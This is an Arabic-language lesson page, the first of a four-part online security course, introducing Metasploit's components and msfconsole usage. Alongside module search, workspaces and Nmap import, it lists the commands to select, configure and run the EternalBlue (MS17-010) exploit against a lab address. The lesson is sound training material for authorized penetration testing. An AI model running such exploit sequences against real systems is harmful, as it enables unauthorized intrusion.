بنية Metasploit وmsfconsole
تجوّل في msfconsole، وافهم بنية الاستغلالات والحمولات والوحدات، واضبط الخيارات.
بنية Metasploit وmsfconsole درس مجاني في Cyber Security Academy على CoddyKit. هذا هو الدرس 1 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Cyber Security Academy، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.
ما هو Metasploit؟
Metasploit Framework هي منصة مفتوحة المصدر لاختبار الاختراق، وتوفر واجهة موحدة لتطوير عمليات الاستغلال واختبارها وتنفيذها. وهي الأداة المعيارية في المجال للاستغلال المصرح به داخل البيئات المختبرية.
مكوّنات Metasploit
المكوّنات الأساسية هي: msfconsole (واجهة CLI تفاعلية)، وmsfvenom (مولّد الحمولات)، وMetasploit DB (قاعدة PostgreSQL لتخزين المضيفين والجلسات)، وArmitage (واجهة أمامية رسومية).
بدء تشغيل msfconsole
شغّل msfconsole وهيّئ قاعدة البيانات. سيتغير موجه الأوامر إلى msf6 >. تعمل الإكمالات التلقائية باستخدام زر Tab مع جميع الأوامر وأسماء الوحدات والخيارات.
# Start msfconsole
msfconsole
# Initialize database (if needed)
msfdb init
msfdb start
# Check DB connection
msf6 > db_status
# [*] Connected to msf. Connection type: postgresql.أنواع الوحدات
ينظم Metasploit إمكاناته ضمن أنواع من الوحدات: exploit (شفرة هجوم خاصة بالثغرة)، وpayload (شفرة تُشغّل بعد الاستغلال)، وauxiliary (أدوات الفحص وfuzzing)، وpost (ما بعد الاستغلال)، وencoder، وnop.
msf6 > show exploits # list exploit modules
msf6 > show auxiliary # list auxiliary modules
msf6 > show payloads # list payloads
msf6 > show post # post-exploitation modulesالبحث عن الوحدات
يُرشّح الأمر search الوحدات حسب الاسم أو CVE أو المنصة أو التصنيف. ويشير تصنيف الوحدة إلى مستوى موثوقيتها: Excellent > Great > Good > Normal > Average > Low.
msf6 > search type:exploit name:eternalblue
msf6 > search cve:2021-44228
msf6 > search platform:windows smb
msf6 > search rank:excellent ms17استخدام وحدة استغلال
حدّد وحدة باستخدام use، واعرض الخيارات المطلوبة باستخدام show options، واضبط القيم باستخدام set، ثم شغّلها باستخدام run أو exploit.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.10
msf6 exploit(ms17_010_eternalblue) > runضبط الخيارات العامة
يضبط setg الخيارات بشكل عام لجميع الوحدات اللاحقة، وهو مفيد مع LHOST وLPORT وRHOSTS التي تظل ثابتة طوال عملية الاختبار.
msf6 > setg LHOST 192.168.1.10
msf6 > setg LPORT 4444
# Unset global
msf6 > unsetg LHOSTالوحدات المساعدة
تنفذ الوحدات المساعدة عمليات الفحص والحصر وfuzzing دون تسليم حمولات. ومن أمثلتها: أداة فحص إصدار SMB، وأداة brute force لتسجيل الدخول عبر SSH، وأداة فحص أدلة HTTP.
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_version) > set THREADS 10
msf6 auxiliary(smb_version) > runإدارة مساحات العمل
تنظم مساحات العمل بيانات الفحص والجلسات لكل عملية اختبار. أنشئ مساحة عمل جديدة في بداية كل تقييم للحفاظ على فصل البيانات.
msf6 > workspace # list workspaces
msf6 > workspace -a lab_test # create
msf6 > workspace lab_test # switch
msf6 > hosts # show discovered hosts
msf6 > services # show discovered servicesتكامل Nmap
استورد نتائج فحص Nmap بصيغة XML مباشرةً إلى قاعدة بيانات Metasploit لملء جدولي المضيفين والخدمات، مما يتيح اختيار الوحدات المناسبة للهدف.
msf6 > db_nmap -sV 192.168.1.0/24
# Or import existing XML:
msf6 > db_import /path/to/scan.xml
msf6 > hosts
msf6 > services -p 445المساعدة والتوثيق
تحتوي كل وحدة على وثائق مضمّنة. استخدم info لقراءة وصف الوحدة، وتصنيف موثوقيتها، والمراجع (CVE والتنبيهات الأمنية)، والخيارات المطلوبة.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info
# Shows: description, CVE references,
# platform, architecture, reliability rankتحقق سريع
ما الأمر الذي يحدد وحدة في msfconsole؟
ملخص: بنية Metasploit
يُعد msfconsole المركز الرئيسي: ابحث عن الوحدات، واضبط الخيارات، وشغّل عمليات الاستغلال، وأدر الجلسات. اعمل دائمًا ضمن مساحة عمل مُسمّاة، واستورد نتائج Nmap لملء قاعدة البيانات، واقرأ معلومات الوحدة قبل تشغيل أي شيء — افهم ما الذي تنفذه ولماذا.
الأسئلة الشائعة
هل درس «بنية Metasploit وmsfconsole» مجاني؟
نعم — نص درس «بنية Metasploit وmsfconsole» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Cyber Security Academy، انتقل إلى CoddyKit PRO. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.
ماذا ستتعلم في «بنية Metasploit وmsfconsole»؟
تجوّل في msfconsole، وافهم بنية الاستغلالات والحمولات والوحدات، واضبط الخيارات. تتمرن على Cyber Security Academy مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.
هل أحتاج إلى خبرة سابقة لأبدأ Cyber Security Academy؟
لا تُشترط خبرة سابقة. Cyber Security Academy على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 1 من أصل 4.
كم من الوقت يستغرق درس «بنية Metasploit وmsfconsole»؟
معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.
هل يمكنني كتابة وتشغيل أكواد في درس Cyber Security Academy هذا؟
نعم. كل درس في Cyber Security Academy يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.
جميع الدروس في هذه الدورة
- بنية Metasploit وmsfconsole
- استغلال ثغرة معروفة
- الحمولات: المرحلية وغير المرحلية وMeterpreter
- ما بعد الاستغلال: التمحور والاستمرارية